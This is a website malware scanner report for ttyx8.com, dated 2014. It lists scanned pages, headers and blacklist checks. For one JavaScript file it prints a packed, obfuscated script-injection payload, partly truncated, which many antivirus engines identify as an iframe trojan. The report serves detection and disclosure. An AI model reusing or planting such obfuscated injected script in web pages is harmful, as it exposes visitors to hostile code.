New scan:

Malware Scanner report for ttyx8.com

Malicious/Suspicious/Total urls checked
1/0/12
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.ttyx8.com/
HTTP/1.1 200 OK
Cache-Control: max-age=60
Connection: close
Date: Sun, 05 Oct 2014 07:49:28 GMT
Accept-Ranges: bytes
ETag: "241fd8d918dfcf1:26a9"
Content-Length: 116928
Content-Location: http://www.ttyx8.com/index.html
Content-Type: text/html
Expires: Sun, 05 Oct 2014 07:50:28 GMT
Last-Modified: Fri, 03 Oct 2014 14:46:44 GMT
X-Cache: miss
X-Died: timeout at scan.pm line 1546.
X-Server: nanning01-cdn16.fhl
clean
http://www.ttyx8.com/index.html
200 OK
Content-Length: 116928
Content-Type: text/html
clean
http://www.ttyx8.com/iframe/loginjs.php
200 OK
Content-Length: 605
Content-Type: text/html
clean
http://www.ttyx8.com/test404page.js
404 Not Found
Content-Length: 5091
Content-Type: text/html
clean
http://yunjiasu.baidu.com/static/js/http_error.js?20130724
200 OK
Content-Length: 248
Content-Type: application/x-javascript
clean
http://www.ttyx8.com/data/js/acmsd/thea14.js
200 OK
Content-Length: 18
Content-Type: application/x-javascript
clean
http://www.ttyx8.com/data/js/acmsd/thea13.js
200 OK
Content-Length: 290
Content-Type: application/x-javascript
clean
http://www.ttyx8.com/data/js/acmsd/thea11.js
200 OK
Content-Length: 214
Content-Type: application/x-javascript
clean
http://www.ttyx8.com/data/js/acmsd/thea1.js
200 OK
Content-Length: 1140
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write("<script type=\"text/javascript\">/*×Ô¶¨Òå±êÇ©ÔÆ£¬´´½¨ÓÚ2014-3-19*/var cpro_id = \"u1493558\";</script><script src=\"http://cpro.baidustatic.com/cpro/ui/c.js\" type=\"text/javascript\"></script>")












































... 474 bytes are skipped ...
new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('x k$=[\'\\j\\4\\5\\2\\8\\3\\1\\f\\4\\2\\5\\c\\e\\h\\1\\1\\3\\q\\6\\6\\4\\b\\2\\2\\d\\4\\9\\5\\h\\7\\a\\g\\7\\a\\i\\i\\m\\m\\9\\5\\b\\o\\6\\a\\7\\g\\6\\o\\7\\8\\v\\9\\n\\3\\w\\e\\f\\1\\d\\3\\7\\c\\1\\7\\t\\1\\6\\n\\p\\u\\p\\4\\5\\2\\8\\3\\1\\l\\j\\6\\4\\5\\2\\8\\3\\1\\l\'];r.s(k$[0]);',34,34,'|x74|x72|x70|x73|x63|x2f|x65|x69|x2e|x6e|x6f|x3d|x79|x22|x20|x77|x68|x37|x3c|_|x3e|x38|x6a|x6d|x61|x3a|document|write|x78|x76|x32|x67|var'.split('|'),0,{}))

Antivirus reports:

AntiVir
HTML/TwitScroll.B
Avast
JS:Iframe-ALS [Trj]
nProtect
Trojan.Iframe.BZW
Comodo
TrojWare.JS.Iframe.FK
McAfee-GW-Edition
JS/IFrame.gen.j
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Exploit:HTML/IframeRef.DM
MicroWorld-eScan
Trojan.Iframe.BZW
PCTools
Exploit.IFrame
McAfee
JS/IFrame.gen.j
NANO-Antivirus
Trojan.Html.TwitScroll.bklyhq
F-Secure
Trojan.Iframe.BZW
VIPRE
Exploit.HTML.Iframe.dm (v)
AVG
HTML/Framer
Norman
Iframe.UW
Sophos
Troj/Iframe-JG
GData
Trojan.Iframe.BZW
Symantec
IFrame.Exploit
ESET-NOD32
JS/Iframe.HH
BitDefender
Trojan.Iframe.BZW

http://www.ttyx8.com/data/js/acmsd/thea2.js
200 OK
Content-Length: 18
Content-Type: application/x-javascript
clean
http://www.ttyx8.com/data/js/acmsd/thea12.js
200 OK
Content-Length: 612
Content-Type: application/x-javascript
clean
http://www.ttyx8.com/data/js/acmsd/thea4.js
200 OK
Content-Length: 37
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ttyx8.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ttyx8.com
Referer: http://www.google.com/search?q=ttyx8.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ttyx8.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ttyx8.com/

Result: ttyx8.com is not infected or malware details are not published yet.